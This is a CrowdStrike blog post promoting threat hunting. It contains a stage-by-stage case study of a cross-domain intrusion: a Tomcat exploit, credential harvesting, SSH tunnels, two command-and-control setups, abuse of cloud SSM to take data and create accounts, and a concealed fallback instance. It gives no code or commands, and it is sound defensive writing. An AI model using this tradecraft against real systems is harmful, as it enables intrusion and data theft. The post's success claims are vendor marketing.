Intelligence-Led Threat Hunting: The Key to Fighting Cross-Domain Attacks

Cross-domain attacks have become a defining challenge in modern cybersecurity, with adversaries exploiting gaps across endpoints, identity systems, and cloud environments to achieve their objectives. These sophisticated attacks use stealthy, malware-free techniques and legitimate tools, making them exceptionally difficult to detect and disrupt. 

As adversaries grow faster and more resourceful, and data infrastructures become more complex, organizations are at greater risk of blind spots created by disconnected defenses. Addressing this complexity requires a proactive approach that both uncovers threats in real time and connects the dots across the entire attack chain. This is where intelligence-led threat hunting becomes a game-changer.

One of the most notorious cross-domain adversaries is SCATTERED SPIDER. This financially motivated eCrime group targets Fortune 500 companies with adaptive and high-impact attack strategies, including identity abuse and cloud exploitation. They compromise IT and security personnel accounts to access tools and resources for lateral movement and deeper access. SCATTERED SPIDER, an adversary that is known for executing cloud-focused intrusions, uses spearphishing, policy modifications, and password manager access to infiltrate and exploit cloud environments. By penetrating the cloud control plane, SCATTERED SPIDER gains exponentially broader access, enabling seamless pivots across identity, cloud, and endpoint domains to maximize impact.

Read more about the rise of cross-domain attacks in this recent blog post.

A recent technical case study highlights a targeted attack on a pharmaceutical company using a highly coordinated cross-domain strategy exploiting compromised identities, cloud control planes, and lateral movement between endpoints and clouds. This underscores the critical need for full visibility across domains and intelligence-led threat hunting to detect and disrupt sophisticated cross-domain adversaries. 

Here, we break down this attack step-by-step to illustrate how cross-domain attacks unfold, where adversaries can gain an advantage, and how organizations can adjust their defenses.

Case Study Deep Dive

1. Initial Entry and Exploitation

In the first stage of this attack, the adversary set up a command-and-control (C2-1 in Figure 1) infrastructure to launch their attack. They targeted a Linux Tomcat server, exploiting a known vulnerability to gain root access. Once inside, they conducted reconnaissance using standard tools like LDAP search to enumerate network shares and identify additional systems for lateral movement. This reconnaissance yielded additional credentials, enabling lateral movement across the environment. This phase highlights the risk of leaving critical vulnerabilities exposed, as adversaries can exploit them to infiltrate servers running essential services.

2. Lateral Movement and Identity Exploitation

After gaining initial access, the adversary moved laterally through the network using compromised credentials. They transitioned from the Linux Tomcat server to a Windows system, expanding their reach. To maintain covert communication, they generated SSH keys to set up SSH tunnels. Additionally, they targeted the System Security Services to harvest more credentials and gather information on the organization’s cloud infrastructure, enabling deeper access. CrowdStrike Falcon® Identity Protection detected these actions, even as the adversary operated from unmanaged boxes.

3. Privileges and Administrator Access

The adversary compromised accounts with elevated privileges to gain administrative access. The permissions associated with these accounts allowed them to escalate the attack while avoiding detection. This phase illustrates the complexity of privileged account attacks, where admin access is exploited to maintain and expand footholds in compromised networks.

4. Second Stage and Cloud Targeting

To avoid being traced back to their original infrastructure, the adversary set up another command-and-control infrastructure (C2-2) to target the victim’s cloud environment. If one C2 infrastructure was detected, the other remained functional. Using access to Services Systems Manager (SSM), they focused on cloud service instances, bypassing endpoint protections to query sensitive data directly from the control plane. Rather than attacking Windows or Linux instances with installed endpoint detection and response (EDR) agents, the adversary manipulated the control plane to issue commands against cloud service hosts without direct interaction. By exploiting cloud security blind spots, they were able to extract sensitive data, such as intellectual property, without triggering endpoint detection alerts.

5. Persistence and Further Expansion

To ensure persistence, the adversary created additional accounts using SSM and spun up a new cloud service Windows instance. This instance acted as a “break glass” mechanism, providing a fallback in case existing access was lost. This tactic is particularly insidious, as a single instance running quietly in the background often goes unnoticed unless it impacts performance. By blending into normal cloud activity, the adversary maintained long-term access without detection.

While monitoring the environment, CrowdStrike OverWatch threat hunters observed suspicious activities in real time. Once there was enough evidence confirming an intrusion, CrowdStrike immediately alerted the customer and advised on countermeasures to stop the adversary in their tracks. CrowdStrike connected the dots, revealing how the adversary gained credentials, moved through endpoints and clouds, and exploited the control plane. Continuous hunting and cross-domain correlation of malicious activities were key to understanding the adversary’s full scope and stopping the breach.

Turning Insight into Action with Intelligence-Led Defense

Threat hunting and threat intelligence are critical to stay ahead of modern cross-domain attacks, such as the incident described here. Real-time intelligence provides the insights needed to uncover hidden threats early, while proactive threat hunting, such as CrowdStrike Falcon® Adversary OverWatch, delivers 24/7 monitoring to analyze telemetry, identify abnormal patterns, and leverage adversary tradecraft knowledge to detect and stop threats.

By integrating advanced threat intelligence with proactive hunting in a unified security platform, organizations can detect and disrupt attacks faster, reduce response times, and prevent widespread damage. As demonstrated in this case study, this unified, intelligence-driven approach is the key to staying one step ahead of even the most sophisticated adversaries.

Additional Resources

• Read our Combating Cross-Domain Attacks Across Endpoint, Identity and Cloud eBook to gain insight into cross-domain attacks and how to stay ahead of them.
• Watch the Cyber Threat Summit on demand to hear more about modern tactics adversaries use to penetrate systems.
• Request a free consultation to learn how you can better protect your business from cross-domain attacks with CrowdStrike.